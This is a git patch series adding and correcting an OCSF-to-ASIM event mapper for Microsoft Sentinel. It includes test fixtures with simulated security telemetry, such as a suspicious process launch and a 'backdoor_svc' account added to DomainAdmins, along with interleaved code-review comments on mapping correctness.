+ full_name: "Alice Example",
+ name: "alice",
+ uid: "user-1",
+ },
+ },
+ user: {
+ domain: "example.com",
+ email_addr: "alice@example.com",
+ full_name: "Alice Example",
+ name: "alice",
+ uid: "user-1",
+ },
+ src_endpoint: {
+ ip: 203.0.113.10,
+ uid: "device-1",
+ },
+ dst_endpoint: {
+ svc_name: "Microsoft Graph",
+ uid: "resource-1",
+ },
+ service: {
+ name: "Office 365",
+ uid: "app-1",
+ },
+ auth_factors: [
+ {
+ factor_type: "Push Notification",
+ factor_type_id: 5,
+ },
+ ],
+}
+@name = "ocsf.authentication"
+microsoft::ocsf::map_to_asim
+name = @name
+sort EventOriginalUid
+select name, EventSchema, EventSchemaVersion, EventType, EventResult,
+ EventSeverity, EventProduct, EventVendor, EventOriginalType,
+ EventOriginalUid, Dvc, DvcHostname=DvcHostname?, SrcIpAddr, SrcPortNumber,
+ TargetUsername, TargetUsernameType, TargetUserId, TargetUserIdType,
+ TargetAppName=TargetAppName?, TargetAppId=TargetAppId?,
+ LogonProtocol=LogonProtocol?, LogonMethod=LogonMethod?
diff --git a/microsoft/tests/ocsf-to-asim/authentication.txt b/microsoft/tests/ocsf-to-asim/authentication.txt
new file mode 100644
index 0000000..65c3ba5
--- /dev/null
+++ b/microsoft/tests/ocsf-to-asim/authentication.txt
@@ -0,0 +1,48 @@
+{
+ name: "asim.authentication",
+ EventSchema: "Authentication",
+ EventSchemaVersion: "0.1.4",
+ EventType: "Logon",
+ EventResult: "Success",
+ EventSeverity: "Informational",
+ EventProduct: "Microsoft-Windows-Security-Auditing",
+ EventVendor: "Microsoft",
+ EventOriginalType: "4624",
+ EventOriginalUid: "98761",
+ Dvc: "DC01.corp.local",
+ DvcHostname: "DC01.corp.local",
+ SrcIpAddr: 10.0.0.42,
+ SrcPortNumber: 49827,
+ TargetUsername: "CORP\\jdoe",
+ TargetUsernameType: "Windows",
+ TargetUserId: "S-1-5-21-3107921522-2185401913-891411500-1104",
+ TargetUserIdType: "SID",
+ TargetAppName: null,
+ TargetAppId: null,
+ LogonProtocol: "Kerberos",
+ LogonMethod: null,
+}
+{
+ name: "asim.authentication",
+ EventSchema: "Authentication",
+ EventSchemaVersion: "0.1.4",
+ EventType: "Logon",
+ EventResult: "Success",
+ EventSeverity: "Informational",
+ EventProduct: "Microsoft Entra ID",
+ EventVendor: "Microsoft",
+ EventOriginalType: "300201",
+ EventOriginalUid: "sign-in-1",
+ Dvc: "Microsoft Entra ID",
+ DvcHostname: null,
+ SrcIpAddr: 203.0.113.10,
+ SrcPortNumber: null,
+ TargetUsername: "example.com\\alice",
+ TargetUsernameType: "Windows",
+ TargetUserId: "user-1",
+ TargetUserIdType: null,
+ TargetAppName: "Office 365",
+ TargetAppId: "app-1",
+ LogonProtocol: null,
+ LogonMethod: "Push Notification",
+}
diff --git a/microsoft/tests/ocsf-to-asim/direct-targets.tql b/microsoft/tests/ocsf-to-asim/direct-targets.tql
new file mode 100644
index 0000000..e616aef
--- /dev/null
+++ b/microsoft/tests/ocsf-to-asim/direct-targets.tql
@@ -0,0 +1,163 @@
+from {
+ activity_id: 1,
+ activity_name: "Create",
+ category_uid: 1,
+ class_uid: 1001,
+ class_name: "File System Activity",
+ type_uid: 100101,
+ time: 2026-01-01T00:00:00Z,
+ severity_id: 1,
+ status: "Success",
+ metadata: {
+ original_event_uid: "file-1",
+ product: {
+ name: "Endpoint",
+ vendor_name: "Microsoft",
+ },
+ version: "1.8.0",
+ },
+ device: {
+ hostname: "host1",
+ },
+ actor: {
+ user: {
+ name: "alice",
+ },
+ },
+ file: {
+ path: "C:\\tmp\\payload.exe",
+ name: "payload.exe",
+ },
+}, {
+ activity_id: 6,
+ activity_name: "Traffic",
+ category_uid: 4,
+ class_uid: 4001,
+ class_name: "Network Activity",
+ type_uid: 400106,
+ time: 2026-01-01T00:00:01Z,
+ severity_id: 1,
+ status: "Success",
+ metadata: {
+ original_event_uid: "net-1",
+ product: {
+ name: "Firewall",
+ vendor_name: "Microsoft",
+ },
+ version: "1.8.0",
+ },
+ device: {
+ hostname: "fw1",
+ },
+ src_endpoint: {
+ ip: 10.0.0.1,
+ port: 12345,
+ },
+ dst_endpoint: {
+ ip: 10.0.0.2,
+ port: 443,
+ },
+ traffic: {
+ bytes_out: 100,
+ bytes_in: 200,
+ },
+}, {
+ activity_id: 1,
+ activity_name: "Query",
+ category_uid: 4,
+ class_uid: 4003,
+ class_name: "DNS Activity",
+ type_uid: 400301,
+ time: 2026-01-01T00:00:02Z,
+ severity_id: 1,
+ status: "Success",
+ rcode: "NA",
+ metadata: {
+ original_event_uid: "dns-1",
+ product: {
+ name: "DNS",
+ vendor_name: "Microsoft",
+ },
+ version: "1.8.0",
+ },
+ device: {
+ hostname: "dns1",
+ },
+ query: {
+ name: "example.org",
+ type: "A",
+ class: "IN",
+ },
+ src_endpoint: {
+ ip: 10.0.0.1,
+ },
+}, {
+ activity_id: 5,
+ activity_name: "Ack",
+ category_uid: 4,
+ class_uid: 4004,
+ class_name: "DHCP Activity",
+ type_uid: 400405,
+ time: 2026-01-01T00:00:03Z,
+ severity_id: 1,
+ status: "Success",
+ metadata: {
+ original_event_uid: "dhcp-1",
+ product: {
+ name: "DHCP",
+ vendor_name: "Microsoft",
+ },
+ version: "1.8.0",
+ },
+ device: {
+ hostname: "dhcp1",
+ },
+ src_endpoint: {
+ hostname: "client1",
+ ip: 10.0.0.50,
+ mac_addr: "00:11:22:33:44:55",
+ },
+}, {
+ activity_id: 3,
+ activity_name: "Get",
+ category_uid: 4,
+ class_uid: 4002,
+ class_name: "HTTP Activity",
+ type_uid: 400203,
+ time: 2026-01-01T00:00:04Z,
+ severity_id: 1,
+ status: "Success",
+ metadata: {
+ original_event_uid: "web-1",
+ product: {
+ name: "Proxy",
+ vendor_name: "Microsoft",
+ },
+ version: "1.8.0",
+ },
+ device: {
+ hostname: "proxy1",
+ },
+ url: {
+ url_string: "https://example.org/index.html",
+ },
+ http_request: {
+ http_method: "GET",
+ },
+ http_response: {
+ code: 200,
+ },
+}
+microsoft::ocsf::map_to_asim
+name = @name
+sort EventOriginalUid
+select name, EventSchema, EventSchemaVersion, EventType, EventResult,
+ EventSeverity, EventOriginalUid, Dvc, ActorUsername=ActorUsername?,
+ TargetFilePath=TargetFilePath?, TargetFilePathType=TargetFilePathType?,
+ TargetFileName=TargetFileName?, SrcIpAddr=SrcIpAddr?,
+ SrcPortNumber=SrcPortNumber?, DstIpAddr=DstIpAddr?,
+ DstPortNumber=DstPortNumber?, SrcBytes=SrcBytes?, DstBytes=DstBytes?,
+ DnsQuery=DnsQuery?, DnsQueryTypeName=DnsQueryTypeName?,
+ DnsQueryClassName=DnsQueryClassName?,
+ EventResultDetails=EventResultDetails?, SrcHostname=SrcHostname?,
+ SrcMacAddr=SrcMacAddr?, Url=Url?, HttpRequestMethod=HttpRequestMethod?
diff --git a/microsoft/tests/ocsf-to-asim/direct-targets.txt b/microsoft/tests/ocsf-to-asim/direct-targets.txt
new file mode 100644
index 0000000..cf0e400
--- /dev/null
+++ b/microsoft/tests/ocsf-to-asim/direct-targets.txt
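Review bot: The DHCP fixture's `src_endpoint` uses `mac_addr: "00:11:22:33:44:55"`, which the 4004 arm of map_to_asim.tql only reaches through its second fallback `src_endpoint?.mac_addr?`; if the OCSF Network Endpoint attribute is `mac`, as I believe it is in 1.x, the fixture exercises the non-OCSF spelling rather than the validated shape the changelog promises, and a fixture carrying `mac` would pin the intended path. The DNS fixture's `query.name` raises the same question against the mapper's `query?.hostname?` fallback. Nothing in this pipeline validates the literal against the OCSF schema before `microsoft::ocsf::map_to_asim`, so a misspelled attribute here passes silently as long as some fallback happens to match.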
@@ -0,0 +1,140 @@ +{ + name: "asim.dhcp_event", + EventSchema: "DhcpEvent", + EventSchemaVersion: "0.1.1", + EventType: "Assign", + EventResult: "Success", + EventSeverity: "Informational", + EventOriginalUid: "dhcp-1", + Dvc: "dhcp1", + ActorUsername: null, + TargetFilePath: null, + TargetFilePathType: null, + TargetFileName: null, + SrcIpAddr: 10.0.0.50, + SrcPortNumber: null, + DstIpAddr: null, + DstPortNumber: null, + SrcBytes: null, + DstBytes: null, + DnsQuery: null, + DnsQueryTypeName: null, + DnsQueryClassName: null, + EventResultDetails: null, + SrcHostname: "client1", + SrcMacAddr: "00:11:22:33:44:55", + Url: null, + HttpRequestMethod: null, +} +{ + name: "asim.dns", + EventSchema: "Dns", + EventSchemaVersion: "0.1.7", + EventType: "Query", + EventResult: "Success", + EventSeverity: "Informational", + EventOriginalUid: "dns-1", + Dvc: "dns1", + ActorUsername: null, + TargetFilePath: null, + TargetFilePathType: null, + TargetFileName: null, + SrcIpAddr: 10.0.0.1, + SrcPortNumber: null, + DstIpAddr: null, + DstPortNumber: null, + SrcBytes: null, + DstBytes: null, + DnsQuery: "example.org", + DnsQueryTypeName: "A", + DnsQueryClassName: "IN", + EventResultDetails: "NA", + SrcHostname: null, + SrcMacAddr: null, + Url: null, + HttpRequestMethod: null, +} +{ + name: "asim.file_event", + EventSchema: "FileEvent", + EventSchemaVersion: "0.2.2", + EventType: "FileCreated", + EventResult: "Success", + EventSeverity: "Informational", + EventOriginalUid: "file-1", + Dvc: "host1", + ActorUsername: "alice", + TargetFilePath: "C:\\tmp\\payload.exe", + TargetFilePathType: "Windows Local", + TargetFileName: "payload.exe", + SrcIpAddr: null, + SrcPortNumber: null, + DstIpAddr: null, + DstPortNumber: null, + SrcBytes: null, + DstBytes: null, + DnsQuery: null, + DnsQueryTypeName: null, + DnsQueryClassName: null, + EventResultDetails: null, + SrcHostname: null, + SrcMacAddr: null, + Url: null, + HttpRequestMethod: null, +} +{ + name: "asim.network_session", + EventSchema: 
"NetworkSession", + EventSchemaVersion: "0.2.7", + EventType: "Flow", + EventResult: "Success", + EventSeverity: "Informational", + EventOriginalUid: "net-1", + Dvc: "fw1", + ActorUsername: null, + TargetFilePath: null, + TargetFilePathType: null, + TargetFileName: null, + SrcIpAddr: 10.0.0.1, + SrcPortNumber: 12345, + DstIpAddr: 10.0.0.2, + DstPortNumber: 443, + SrcBytes: 100, + DstBytes: 200, + DnsQuery: null, + DnsQueryTypeName: null, + DnsQueryClassName: null, + EventResultDetails: null, + SrcHostname: null, + SrcMacAddr: null, + Url: null, + HttpRequestMethod: null, +} +{ + name: "asim.web_session", + EventSchema: "WebSession", + EventSchemaVersion: "0.2.7", + EventType: "HTTPsession", + EventResult: "Success", + EventSeverity: "Informational", + EventOriginalUid: "web-1", + Dvc: "proxy1", + ActorUsername: null, + TargetFilePath: null, + TargetFilePathType: null, + TargetFileName: null, + SrcIpAddr: null, + SrcPortNumber: null, + DstIpAddr: null, + DstPortNumber: null, + SrcBytes: null, + DstBytes: null, + DnsQuery: null, + DnsQueryTypeName: null, + DnsQueryClassName: null, + EventResultDetails: "200", + SrcHostname: null, + SrcMacAddr: null, + Url: "https://example.org/index.html", + HttpRequestMethod: "GET", +} diff --git a/microsoft/tests/ocsf-to-asim/process.tql b/microsoft/tests/ocsf-to-asim/process.tql new file mode 100644 index 0000000..a70ec48 --- /dev/null +++ b/microsoft/tests/ocsf-to-asim/process.tql 
@@ -0,0 +1,56 @@ +from { + activity_id: 1, + activity_name: "Launch", + category_uid: 1, + category_name: "System Activity", + class_uid: 1007, + class_name: "Process Activity", + type_uid: 100701, + type_name: "Process Activity: Launch", + time: 2024-03-23T12:34:56.789012300Z, + severity_id: 1, + severity: "Informational", + status_id: 1, + status: "Success", + metadata: { + event_code: "4688", + original_event_uid: "98764", + product: { + name: "Microsoft-Windows-Security-Auditing", + vendor_name: "Microsoft", + }, + profiles: ["host"], + version: "1.8.0", + }, + device: { + hostname: "WINHOST01.corp.local", + }, + actor: { + session: { + uid_alt: "0xA1B2C3", + }, + user: { + domain: "CORP", + name: "jdoe", + uid: "S-1-5-21-3107921522-2185401913-891411500-1104", + }, + }, + process: { + pid: 6732, + name: "payload.exe", + path: "C:\\tmp\\payload.exe", + cmd_line: "payload.exe --c2 10.0.0.1", + parent_process: { + pid: 4660, + name: "wscript.exe", + }, + }, +} +@name = "ocsf.process_activity" +microsoft::ocsf::map_to_asim +name = @name +select name, EventSchema, EventSchemaVersion, EventType, EventResult, + EventSeverity, EventOriginalType, DvcHostname, ActorUsername, + ActorUsernameType, ActorUserId, ActorUserIdType, ActingProcessId, + ParentProcessId, TargetProcessId, TargetProcessName, + TargetProcessCommandLine diff --git a/microsoft/tests/ocsf-to-asim/process.txt b/microsoft/tests/ocsf-to-asim/process.txt new file mode 100644 index 0000000..299bbb6 --- /dev/null +++ b/microsoft/tests/ocsf-to-asim/process.txt 
@@ -0,0 +1,19 @@ +{ + name: "asim.process_event", + EventSchema: "ProcessEvent", + EventSchemaVersion: "0.1.4", + EventType: "ProcessCreated", + EventResult: "Success", + EventSeverity: "Informational", + EventOriginalType: "4688", + DvcHostname: "WINHOST01.corp.local", + ActorUsername: "CORP\\jdoe", + ActorUsernameType: "Windows", + ActorUserId: "S-1-5-21-3107921522-2185401913-891411500-1104", + ActorUserIdType: "SID", + ActingProcessId: "4660", + ParentProcessId: "4660", + TargetProcessId: "6732", + TargetProcessName: "payload.exe", + TargetProcessCommandLine: "payload.exe --c2 10.0.0.1", +} diff --git a/microsoft/tests/ocsf-to-asim/unsupported-strict.tql b/microsoft/tests/ocsf-to-asim/unsupported-strict.tql new file mode 100644 index 0000000..1016c0b --- /dev/null +++ b/microsoft/tests/ocsf-to-asim/unsupported-strict.tql @@ -0,0 +1,30 @@ +--- +error: true +--- + +from { + activity_id: 1, + activity_name: "Execute", + category_uid: 1, + class_uid: 1009, + class_name: "Script Activity", + type_uid: 100901, + type_name: "Script Activity: Execute", + time: 2024-03-23T12:34:56Z, + severity_id: 2, + metadata: { + original_event_uid: "script-1", + product: { + name: "PowerShell", + vendor_name: "Microsoft", + }, + version: "1.8.0", + }, + device: { + hostname: "WINHOST01", + }, +} +@name = "ocsf.script_activity" +strict { + microsoft::ocsf::map_to_asim +} diff --git a/microsoft/tests/ocsf-to-asim/unsupported-strict.txt b/microsoft/tests/ocsf-to-asim/unsupported-strict.txt new file mode 100644 index 0000000..44a4da6 --- /dev/null +++ b/microsoft/tests/ocsf-to-asim/unsupported-strict.txt @@ -0,0 +1 @@ +error: assertion failed: {reason:"unsupported OCSF to ASIM mapping",class_uid:1009,class_name:"Script Activity",type_uid:100901,type_name:"Script Activity: Execute",name:"ocsf.script_activity"} diff --git a/microsoft/tests/ocsf-to-asim/user-management.tql b/microsoft/tests/ocsf-to-asim/user-management.tql new file mode 100644 index 0000000..a46548e --- /dev/null 
+++ b/microsoft/tests/ocsf-to-asim/user-management.tql 
@@ -0,0 +1,86 @@ +from { + activity_id: 1, + activity_name: "Create", + category_uid: 3, + category_name: "Identity & Access Management", + class_uid: 3001, + class_name: "Account Change", + type_uid: 300101, + type_name: "Account Change: Create", + time: 2024-03-23T12:34:56.789012300Z, + severity_id: 1, + metadata: { + event_code: "4720", + original_event_uid: "98767", + product: { + name: "Microsoft-Windows-Security-Auditing", + vendor_name: "Microsoft", + }, + profiles: ["host"], + version: "1.8.0", + }, + device: { + hostname: "DC01.corp.local", + }, + actor: { + user: { + domain: "CORP", + name: "jdoe", + uid: "S-1-5-21-3107921522-2185401913-891411500-1104", + }, + }, + user: { + domain: "CORP", + name: "backdoor_svc", + uid: "S-1-5-21-3107921522-2185401913-891411500-1500", + }, +}, { + activity_id: 3, + activity_name: "Add User", + category_uid: 3, + category_name: "Identity & Access Management", + class_uid: 3006, + class_name: "Group Management", + type_uid: 300603, + type_name: "Group Management: Add User", + time: 2024-03-23T12:34:57Z, + severity_id: 1, + metadata: { + event_code: "4728", + original_event_uid: "98776", + product: { + name: "Microsoft-Windows-Security-Auditing", + vendor_name: "Microsoft", + }, + profiles: ["host"], + version: "1.8.0", + }, + device: { + hostname: "DC01.corp.local", + }, + actor: { + user: { + domain: "CORP", + name: "jdoe", + uid: "S-1-5-21-3107921522-2185401913-891411500-1104", + }, + }, + group: { + domain: "CORP", + name: "DomainAdmins", + uid: "S-1-5-21-3107921522-2185401913-891411500-512", + }, + user: { + name: "CN=backdoor_svc,CN=Users,DC=corp,DC=local", + uid: "S-1-5-21-3107921522-2185401913-891411500-1500", + }, +} +@name = "ocsf.account_change" +microsoft::ocsf::map_to_asim +name = @name +sort EventOriginalType +select name, EventSchema, EventSchemaVersion, EventType, EventResult, + EventSeverity, EventOriginalType, DvcHostname, ActorUsername, + ActorUsernameType, TargetUsername, 
TargetUsernameType=TargetUsernameType?, + TargetUserId, TargetUserIdType, GroupName=GroupName?, GroupId=GroupId?, + GroupIdType=GroupIdType? diff --git a/microsoft/tests/ocsf-to-asim/user-management.txt b/microsoft/tests/ocsf-to-asim/user-management.txt new file mode 100644 index 0000000..23d95e0 --- /dev/null +++ b/microsoft/tests/ocsf-to-asim/user-management.txt @@ -0,0 +1,38 @@ +{ + name: "asim.user_management", + EventSchema: "UserManagement", + EventSchemaVersion: "0.1.2", + EventType: "UserCreated", + EventResult: "NA", + EventSeverity: "Informational", + EventOriginalType: "4720", + DvcHostname: "DC01.corp.local", + ActorUsername: "CORP\\jdoe", + ActorUsernameType: "Windows", + TargetUsername: "CORP\\backdoor_svc", + TargetUsernameType: "Windows", + TargetUserId: "S-1-5-21-3107921522-2185401913-891411500-1500", + TargetUserIdType: "SID", + GroupName: null, + GroupId: null, + GroupIdType: null, +} +{ + name: "asim.user_management", + EventSchema: "UserManagement", + EventSchemaVersion: "0.1.2", + EventType: "UserAddedToGroup", + EventResult: "NA", + EventSeverity: "Informational", + EventOriginalType: "4728", + DvcHostname: "DC01.corp.local", + ActorUsername: "CORP\\jdoe", + ActorUsernameType: "Windows", + TargetUsername: "CN=backdoor_svc,CN=Users,DC=corp,DC=local", + TargetUsernameType: null, + TargetUserId: "S-1-5-21-3107921522-2185401913-891411500-1500", + TargetUserIdType: "SID", + GroupName: "DomainAdmins", + GroupId: "S-1-5-21-3107921522-2185401913-891411500-512", + GroupIdType: "SID", +} From 6e1707df4b3323187791a6e5fe2914efbd29905d Mon Sep 17 00:00:00 2001 
From: Matthias Vallentin Date: Sun, 7 Jun 2026 17:23:24 +0200 Subject: [PATCH 02/27] Fix ASIM mapping correctness in OCSF mapper Address review findings against the authoritative ASIM schema data and OCSF 1.8 reference: - Map OCSF Logoff activity to EventType Logoff instead of Logon. - Read the URL from http_request.url.url_string so Url is a string, not a record, on conformant OCSF input. - Preserve the full original OCSF event under AdditionalFields instead of a fixed metadata envelope that silently dropped unmapped payload fields. - Normalize enumerated fields: ThreatCategory via lookup table with ThreatOriginalCategory, AlertVerdict to the four allowed values, Authentication EventSubType from logon_type with EventOriginalSubType, and Dns EventType from the query opcode with request/response EventSubType. - Map severity_id 6 (Fatal) to High and stop passing arbitrary severity strings into EventSeverity. - Orient rename events correctly: OCSF file becomes SrcFile* and file_result becomes TargetFile*. - Derive ParentProcessId from the acting process's parent instead of the acting process itself. - Honor OCSF start_time for EventStartTime. - Drop the explicit unsupported class list in favor of the fallback. - Make test fixtures OCSF-1.8-conformant (query.hostname, src_endpoint.mac, http_request.url) and add Logoff, rename, and logon_type coverage. 
Co-Authored-By: Claude Opus 4.8 (1M context) Assisted-by: Claude Opus 4.8 (Claude Code) --- .../unreleased/ocsf-to-asim-mapper.md | 3 +- microsoft/operators/ocsf/asim/common.tql | 29 +++--- microsoft/operators/ocsf/map_to_asim.tql | 88 +++++++++++++++---- microsoft/tests/ocsf-to-asim/alert.tql | 3 +- microsoft/tests/ocsf-to-asim/alert.txt | 3 +- .../tests/ocsf-to-asim/authentication.tql | 42 ++++++++- .../tests/ocsf-to-asim/authentication.txt | 30 +++++++ .../tests/ocsf-to-asim/direct-targets.tql | 47 ++++++++-- .../tests/ocsf-to-asim/direct-targets.txt | 40 +++++++++ microsoft/tests/ocsf-to-asim/process.tql | 8 ++ microsoft/tests/ocsf-to-asim/process.txt | 2 +- 11 files changed, 245 insertions(+), 50 deletions(-) diff --git a/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md b/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md index c7c3730..8655ed3 100644 --- a/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md +++ b/microsoft/changelog/unreleased/ocsf-to-asim-mapper.md @@ -12,4 +12,5 @@ validated OCSF 1.8 events into flat Microsoft Sentinel ASIM event records. The mapper covers the Microsoft package's current OCSF authentication, process, audit, user-management, and alert outputs, plus direct OCSF counterparts for -file, network, DNS, DHCP, and web session ASIM schemas. +file, network, DNS, DHCP, and web session ASIM schemas. The full original OCSF +event is preserved under `AdditionalFields` so no source data is lost. diff --git a/microsoft/operators/ocsf/asim/common.tql b/microsoft/operators/ocsf/asim/common.tql index 60d18d7..441db8f 100644 --- a/microsoft/operators/ocsf/asim/common.tql +++ b/microsoft/operators/ocsf/asim/common.tql 
@@ -5,7 +5,7 @@ description: Initializes shared ASIM fields from a validated OCSF event.
 asim = {}
 asim.EventCount = 1
-asim.EventStartTime = time
+asim.EventStartTime = start_time? else time
 asim.EventEndTime = end_time? else time
 asim.EventProduct = metadata?.product?.name? else metadata?.product?.feature?.name? else "Unknown"
 asim.EventVendor = metadata?.product?.vendor_name? else "Microsoft"
@@ -40,13 +40,20 @@ match severity_id? {
 asim.EventSeverity = "High"
 asim.EventOriginalSeverity = severity? else "Critical"
 }
- _ if severity? == "Critical" => {
+ 6 => {
+ asim.EventSeverity = "High"
+ asim.EventOriginalSeverity = severity? else "Fatal"
+ }
+ _ if severity? == "Critical" or severity? == "Fatal" => {
 asim.EventSeverity = "High"
 asim.EventOriginalSeverity = severity
 }
- _ if severity? != null => {
+ _ if severity? in ["Informational", "Low", "Medium", "High"] => {
 asim.EventSeverity = severity
 }
+ _ if severity? != null => {
+ asim.EventOriginalSeverity = severity
+ }
 _ => {}
 }
@@ -105,19 +112,3 @@ match class_uid {
 if action? != null {
 asim.DvcAction = action
 }
-
-asim.AdditionalFields = {
- category_uid: category_uid?,
- category_name: category_name?,
- class_uid: class_uid?,
- class_name: class_name?,
- activity_id: activity_id?,
- activity_name: activity_name?,
- type_uid: type_uid?,
- type_name: type_name?,
- metadata: metadata?,
- cloud: cloud?,
- unmapped: unmapped?,
- raw_data: raw_data?,
- raw_data_size: raw_data_size?,
-}
diff --git a/microsoft/operators/ocsf/map_to_asim.tql b/microsoft/operators/ocsf/map_to_asim.tql
index 03283d7..78c01ef 100644
--- a/microsoft/operators/ocsf/map_to_asim.tql
+++ b/microsoft/operators/ocsf/map_to_asim.tql
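Review bot: The new `_ if severity? in ["Informational", "Low", "Medium", "High"]` arm sets `asim.EventSeverity` but not `asim.EventOriginalSeverity`, while every other arm of `match severity_id?` — including the `6 =>` and `_ if severity? != null` arms this hunk adds — records the original value. An event whose severity arrives only as one of those four strings therefore loses the field that a non-ASIM string keeps. Adding `asim.EventOriginalSeverity = severity` to that arm makes the two string paths symmetric. The match block opens before the hunk.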
@@ -2,6 +2,21 @@ description: Validated OCSF 1.8 event → Microsoft Sentinel ASIM event.
 ---
+let $threat_categories = {
+ adware: "Adware",
+ cryptominer: "Cryptominor",
+ malware: "Malware",
+ phishing: "Phishing",
+ ransomware: "Ransomware",
+ rootkit: "Rootkit",
+ spam: "Spam",
+ spoofing: "Spoofing",
+ spyware: "Spyware",
+ trojan: "Trojan",
+ virus: "Virus",
+ worm: "Worm",
+}
+
 microsoft::ocsf::asim::common
 match class_uid {
@@ -17,7 +32,12 @@ match class_uid {
 asim.EventReportUrl = finding_info?.url? else null
 asim.EventSubType = "Compliance Violation" if class_uid == 2003 else "Threat"
 asim.ThreatName = malware?[0]?.name? else finding_info?.title?
- asim.ThreatCategory = finding_info?.types?[0]? else compliance?.status?
+ if class_uid == 2003 {
+ asim.ThreatCategory = "Security Policy Violation"
+ } else {
+ asim.ThreatCategory = $threat_categories[finding_info?.types?[0]?.to_lower()]?
+ }
+ asim.ThreatOriginalCategory = finding_info?.types?[0]?
 asim.Username = user?.email_addr? else user?.name? else actor?.user?.email_addr? else actor?.user?.name?
 asim.UserId = user?.uid? else actor?.user?.uid?
 asim.UserIdType = "SID" if (asim.UserId?.starts_with("S-") else false) else null
@@ -31,7 +51,13 @@ match class_uid {
 _ => {}
 }
 asim.AlertOriginalStatus = status?
- asim.AlertVerdict = verdict?
+ match verdict? {
+ "True Positive" => { asim.AlertVerdict = "True Positive" }
+ "False Positive" => { asim.AlertVerdict = "False Positive" }
+ "Benign" => { asim.AlertVerdict = "Benign Positive" }
+ "Unknown" => { asim.AlertVerdict = "Unknown" }
+ _ => {}
+ }
 }
 1006 | 1008 | 3004 | 201004 => {
 @name = "asim.audit_event"
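Review bot: The `$threat_categories[...]?` lookup in the `@@ -17,7` hunk leaves `asim.ThreatCategory` null whenever `finding_info.types[0]` is not one of the twelve keys, so a finding whose type string is spelled differently or lies outside the table reaches ASIM with no category even though `ThreatOriginalCategory` carries the raw value; if the ASIM AlertEvent schema's `Unknown` value is meant as the catch-all, `asim.ThreatCategory = $threat_categories[finding_info?.types?[0]?.to_lower()]? else "Unknown"` would make that explicit rather than implicit. The `match verdict?` hunk below has the same shape: OCSF verdicts outside the four arms fall into `_ => {}` and, unlike status, have no `AlertOriginal*` column preserving them, so a comment such as `// verdicts outside the four ASIM values are intentionally dropped; the raw event remains in AdditionalFields` would record that the loss is deliberate. Both enclosing alert arms extend beyond the hunks.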
@@ -77,8 +103,25 @@ match class_uid {
 @name = "asim.authentication"
 asim.EventSchema = "Authentication"
 asim.EventSchemaVersion = "0.1.4"
- asim.EventType = "Elevate" if class_uid == 3003 else "Logon"
- asim.EventSubType = activity_name?
+ match activity_name {
+ "Logoff" => { asim.EventType = "Logoff" }
+ _ => { asim.EventType = "Elevate" if class_uid == 3003 else "Logon" }
+ }
+ match logon_type? {
+ "System" => { asim.EventSubType = "System" }
+ "Interactive" | "Cached Interactive" | "Unlock" | "Cached Unlock" => {
+ asim.EventSubType = "Interactive"
+ }
+ "Network" | "Network Cleartext" => { asim.EventSubType = "Remote" }
+ "Remote Interactive" | "Cached Remote Interactive" => {
+ asim.EventSubType = "RemoteInteractive"
+ }
+ "OS Service" => { asim.EventSubType = "Service" }
+ _ => {}
+ }
+ if logon_type? != null {
+ asim.EventOriginalSubType = logon_type
+ }
 asim.ActorUsername = actor?.user?.email_addr? else actor?.user?.name? else actor?.user?.uid?
 if actor?.user?.domain? != null and actor?.user?.name? != null {
 asim.ActorUsername = f"{actor.user.domain}\\{actor.user.name}"
@@ -176,7 +219,7 @@ match class_uid {
 asim.ActorUserId = actor?.user?.uid?
 asim.ActorUserIdType = "SID" if (asim.ActorUserId?.starts_with("S-") else false) else null
 asim.ActingProcessId = actor?.process?.pid?.string() else process?.parent_process?.pid?.string() else process?.pid?.string()
- asim.ParentProcessId = process?.parent_process?.pid?.string()
+ asim.ParentProcessId = actor?.process?.parent_process?.pid?.string()
 asim.TargetProcessId = process?.pid?.string()
 asim.TargetProcessName = process?.name? else process?.file?.name? else process?.path?.split("\\")[-1]
 asim.TargetProcessCommandLine = process?.cmd_line?
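Review bot: Both new matches key on the display strings `activity_name` and `logon_type` rather than on the numeric enums `activity_id` and `logon_type_id`, which the fixtures in this commit also carry (authentication.tql adds `logon_type_id: 3` next to `logon_type: "Network"`, and the Logoff event has `activity_id: 2`); the ids are the normative OCSF values, so a producer that emits a differently cased or localized label would silently fall back to `Logon` with no subtype while still being a conformant event. `match activity_id { 2 => { asim.EventType = "Logoff" } _ => { ... } }` and `match logon_type_id?` keyed on the ids, with the string kept only for `EventOriginalSubType`, would be more robust. Separately, `match activity_name` is written without `?` while the neighbouring `match logon_type?` uses it; if `activity_name` can be absent from validated input, confirm this does not warn or fail for events that carry only `activity_id`. The authentication arm continues past both ends of the hunk.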
@@ -203,10 +246,15 @@ match class_uid {
 }
 asim.ActorUserId = actor?.user?.uid?
 asim.TargetFilePath = file?.path? else file?.name?
- asim.TargetFilePathType = "Windows Local" if (asim.TargetFilePath?.contains("\\") else false) else "Unix Local"
 asim.TargetFileName = file?.name? else asim.TargetFilePath?.split("\\")[-1]
- asim.SrcFilePath = file_result?.path?
- asim.SrcFileName = file_result?.name?
+ if activity_name == "Rename" and file_result? != null {
+ asim.SrcFilePath = asim.TargetFilePath
+ asim.SrcFileName = asim.TargetFileName
+ asim.SrcFilePathType = "Windows Local" if (asim.SrcFilePath?.contains("\\") else false) else "Unix Local"
+ asim.TargetFilePath = file_result.path? else asim.TargetFilePath
+ asim.TargetFileName = file_result.name? else asim.TargetFileName
+ }
+ asim.TargetFilePathType = "Windows Local" if (asim.TargetFilePath?.contains("\\") else false) else "Unix Local"
 assert asim.ActorUsername != null and asim.TargetFilePath != null, message={reason: "insufficient OCSF fields for ASIM mapping", class_uid: class_uid, class_name: class_name, type_uid: type_uid, type_name: type_name, name: @name}
 }
@@ -242,8 +290,8 @@ match class_uid {
 asim.EventSchema = "WebSession"
 asim.EventSchemaVersion = "0.2.7"
 asim.EventType = "HTTPsession"
- asim.Url = url?.url_string? else http_request?.url?
- asim.HttpRequestMethod = http_request?.http_method? else http_request?.method? else activity_name?.to_upper()
+ asim.Url = http_request?.url?.url_string?
+ asim.HttpRequestMethod = http_request?.http_method? else activity_name?.to_upper()
 asim.EventResultDetails = http_response?.code?.string() else status_code?.string()
 if http_response?.code? != null {
 asim.EventResult = "Success" if http_response.code < 400 else "Failure"
